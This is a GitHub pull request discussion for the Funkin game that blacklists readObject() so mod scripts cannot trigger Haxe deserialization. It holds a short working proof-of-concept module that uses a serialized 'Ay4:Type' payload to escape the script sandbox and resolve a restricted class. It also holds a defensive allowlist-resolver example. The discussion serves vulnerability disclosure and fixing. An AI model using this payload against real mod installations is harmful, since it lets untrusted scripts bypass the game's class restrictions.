
[VULNERABILITY] Blacklist readObject() functions#7018

Merged
Hundrec merged 1 commit intoFunkinCrew:dummy/develop-v0.8.3from
charlesisfeline:no-more-using-unserializer-guys
Mar 20, 2026

Conversation

@charlesisfeline
Contributor

@charlesisfeline charlesisfeline commented Feb 27, 2026

Description

blacklists the readObject() function in ByteArrayData, FileStream, and Socket since they all return Unserializer.run if encoded in HXSF format.
btw do note that for the exploit to work, they have to be serialized properly

if i see Unserializer one more time im gonna shit myself

(yes ik FileStream and Socket aren't compiled in even without DCE but still, this prevents scripts from using it even when #7115 gets merged)

@github-actions github-actions Bot added size: small A small pull request with 10 or fewer changes. pr: haxe PR modifies game code. status: pending triage Awaiting review. and removed size: small A small pull request with 10 or fewer changes. labels Feb 27, 2026
@charlesisfeline charlesisfeline changed the title [CHORE blacklist readObject from scripts [CHORE] Blacklist readObject from scripts Feb 27, 2026
@charlesisfeline charlesisfeline changed the title [CHORE] Blacklist readObject from scripts [VULNERABILITY/CHORE] Blacklist readObject() functions Feb 27, 2026
Contributor

@TechnikTil TechnikTil left a comment



Contributor

@FuroYT FuroYT left a comment


as the leader of the EliteMasters we approve this pull request


@Hundrec Hundrec added type: security vulnerability Involves a security vulnerability within the game. size: small A small pull request with 10 or fewer changes. labels Feb 28, 2026
@TechnikTil
Contributor

heres a module to test this exploit:

import funkin.modding.module.Module;
import openfl.utils.ByteArrayData;
import haxe.io.Bytes;

class ByteArrayExploit extends Module
{
  public function new()
  {
    super('byteArrayExploit');
  }

  public function onCreate(event:ScriptEvent)
  {
    var typeSerialized:String = "Ay4:Type"; // representation of the type class inside of HXSF.

    // turn it into bytes that the reader can read
    var byteArrayWriter:ByteArrayData = new ByteArrayData();
    byteArrayWriter.writeUTF(typeSerialized);

    // create bytearray with those bytes we wrote, and make sure it uses hxsf so it reads properly.
    var byteArrayReader:ByteArrayData = ByteArrayData.fromBytes(byteArrayWriter);
    byteArrayReader.objectEncoding = 10;

    // resolve class evilly
    var type = byteArrayReader.readObject();
    var polymore = type.resolveClass('polymod.Polymod');
    throw polymore.listModFiles(); // if this throws the right thing, then it works!
    super.onCreate(event);
  }
}
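The root cause in both the description and the module above is that readObject() in HXSF mode hands the payload to Unserializer.run, whose default resolver will materialise any class reference ("A" + a name) via Type.resolveClass. The PR closes the script-reachable entry points; as an added, complementary example (not the PR's change or project code) the snippet below installs a fail-closed haxe.Unserializer.DEFAULT_RESOLVER so the same "Ay4:Type" payload is rejected on every Unserializer.run path. The allowlist contents are an assumption.

```haxe
import haxe.Unserializer;

// Fail-closed type resolver: only class names on the allowlist may be
// materialised by any Unserializer, including the Unserializer.run call
// behind readObject() when objectEncoding is HXSF. The list itself is an
// assumption; a project would fill it with the value types it actually
// serializes. Type, Reflect and polymod.Polymod are never on it.
class SafeResolver {
  static var ALLOWED:Array<String> = ["haxe.ds.StringMap"];

  public function new() {}

  // Called by Unserializer for every "A" (class reference) and "c"/"C"
  // (class instance) token in the stream.
  public function resolveClass(name:String):Class<Dynamic> {
    if (ALLOWED.indexOf(name) == -1)
      throw 'deserialization of class "$name" is not permitted';
    return Type.resolveClass(name);
  }

  // Enum values are not needed here, so refuse them outright.
  public function resolveEnum(name:String):Enum<Dynamic> {
    throw 'deserialization of enum "$name" is not permitted';
  }
}

class Main {
  static function main() {
    // Install once at startup; every later Unserializer.run uses it.
    Unserializer.DEFAULT_RESOLVER = new SafeResolver();

    // Same payload as the proof of concept above: a class reference to Type.
    try {
      var resolved = Unserializer.run("Ay4:Type");
      trace('unexpected: resolved ' + Type.getClassName(resolved));
    } catch (e:Dynamic) {
      trace('blocked: ' + e);
    }

    // Plain values still round-trip, so legitimate HXSF data keeps working.
    trace(Unserializer.run("i42") == 42); // true
  }
}
```

This only hardens the deserialization path; a script that can reach Type or Reflect directly still needs the import blacklist, which is why the two controls belong together.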

@charlesisfeline charlesisfeline force-pushed the no-more-using-unserializer-guys branch from 1dad310 to 671c152 Compare March 11, 2026 23:44
@github-actions github-actions Bot added size: tiny A tiny pull request with 4 or fewer changes. and removed size: small A small pull request with 10 or fewer changes. labels Mar 11, 2026
@github-actions github-actions Bot added size: small A small pull request with 10 or fewer changes. and removed size: tiny A tiny pull request with 4 or fewer changes. labels Mar 11, 2026
@charlesisfeline
Contributor Author

idk havent done rebasing before ;-;

@charlesisfeline charlesisfeline force-pushed the no-more-using-unserializer-guys branch from 74ad634 to 1a04e35 Compare March 12, 2026 00:10
@github-actions github-actions Bot added size: tiny A tiny pull request with 4 or fewer changes. and removed size: small A small pull request with 10 or fewer changes. labels Mar 12, 2026
@github-actions github-actions Bot added size: small A small pull request with 10 or fewer changes. and removed size: tiny A tiny pull request with 4 or fewer changes. labels Mar 12, 2026
@charlesisfeline charlesisfeline force-pushed the no-more-using-unserializer-guys branch from 54c5ff3 to df431df Compare March 12, 2026 00:18
@EliteMasterEric EliteMasterEric force-pushed the no-more-using-unserializer-guys branch from df431df to 4270822 Compare March 12, 2026 15:52
Member

@EliteMasterEric EliteMasterEric left a comment


For the record, blacklisting classes is not a CHORE, that label is reserved purely for pull requests with no functional changes (or at least no intended functional changes).

@EliteMasterEric EliteMasterEric added this to the 0.8.4 milestone Mar 12, 2026
@charlesisfeline charlesisfeline changed the title [VULNERABILITY/CHORE] Blacklist readObject() functions [VULNERABILITY] Blacklist readObject() functions Mar 12, 2026
@EliteMasterEric
Member

also YOU STOLE MY EMOJI

AFTER ALL I'VE DONE FOR YOU PEOPLE

@FuroYT
Contributor

FuroYT commented Mar 12, 2026

:eric_whoopsies:

@anysad
Contributor

anysad commented Mar 12, 2026

also YOU STOLE MY EMOJI

AFTER ALL I'VE DONE FOR YOU PEOPLE


@TechnikTil
Contributor

also YOU STOLE MY EMOJI

AFTER ALL I'VE DONE FOR YOU PEOPLE


whoopsie!

@requazar

also YOU STOLE MY EMOJI

AFTER ALL I'VE DONE FOR YOU PEOPLE


@Hundrec Hundrec added status: reviewing internally Under consideration and testing. and removed status: pending triage Awaiting review. labels Mar 13, 2026
@Hundrec Hundrec removed this from the 0.8.4 milestone Mar 13, 2026
@Hundrec Hundrec changed the base branch from develop to dummy/develop-v0.8.3 March 20, 2026 01:57
@Hundrec Hundrec added status: accepted PR was approved for contribution. If it's not already merged, it may be merged on a private branch. and removed status: reviewing internally Under consideration and testing. labels Mar 20, 2026
@Hundrec Hundrec added this to the 0.8.4 milestone Mar 20, 2026
@Hundrec Hundrec merged commit ff4278d into FunkinCrew:dummy/develop-v0.8.3 Mar 20, 2026
6 checks passed